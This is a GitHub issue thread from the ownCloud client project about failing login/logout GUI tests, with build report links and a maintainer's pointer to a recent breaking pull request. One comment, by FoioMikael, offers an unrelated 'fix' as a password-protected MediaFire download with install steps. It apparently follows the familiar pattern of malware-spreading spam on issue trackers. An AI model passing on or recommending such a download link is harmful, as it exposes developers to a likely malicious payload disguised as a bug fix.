### ISSUE TITLE
[QA] Failing login/logout account GUI tests

### ISSUE THREAD

**Issue by saw-jan** [owncloud/client#11837]
### Describe the QA issue

Builds: https://drone.owncloud.com/owncloud/client/19147/2/16
Reports:
- https://cache.owncloud.com/public/owncloud/client/19147/oc10/guiReportUpload/index.html
- https://cache.owncloud.com/public/owncloud/client/19147/ocis/guiReportUpload/index.html

### Screenshots

![Screenshot from 2024-08-27 12-13-37](https://github.com/user-attachments/assets/ffcc8272-29b9-4e6f-af11-3e60143cfa12)

**Comment by saw-jan** [comment]
Recent breaking changes for the test: https://github.com/owncloud/client/pull/11819

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by saw-jan** [comment]
:thinking:
